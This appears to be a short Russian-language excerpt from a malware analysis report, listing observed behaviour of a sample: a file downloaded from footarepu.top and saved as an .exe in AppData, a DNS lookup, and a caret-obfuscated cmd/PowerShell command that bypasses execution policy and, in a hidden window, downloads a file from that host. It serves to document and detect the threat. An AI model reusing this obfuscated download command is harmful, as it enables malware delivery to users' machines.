Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OW^E^rSH^e^Ll.^Ex^E -^exe^C^utiOnpolI^c^Y ^Byp^ASs^ -nO^P^r^oFI^l^E ^-^Wi^N^dOwst^ylE hID^D^En (ne^W^-Objec^t s^Y^StEm.NE^T^.W^eBc^lieNt^)^.d^oWn^l^O^A^D^FI^l^e('http://footarep...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "P^OW^E^rSH^e^Ll.^Ex^E -^exe^C^utiOnpolI^c^Y ^Byp^ASs^ -nO^P^r^oFI^l^E ^-^Wi^N^dOwst^ylE hID^D^En (ne^W^-Objec^t s^Y^StEm.NE^T^.W^eBc^lieNt^)^.d^oWn^l^O^A^D^FI^l^e('http://footarep...' (со скрытым окном)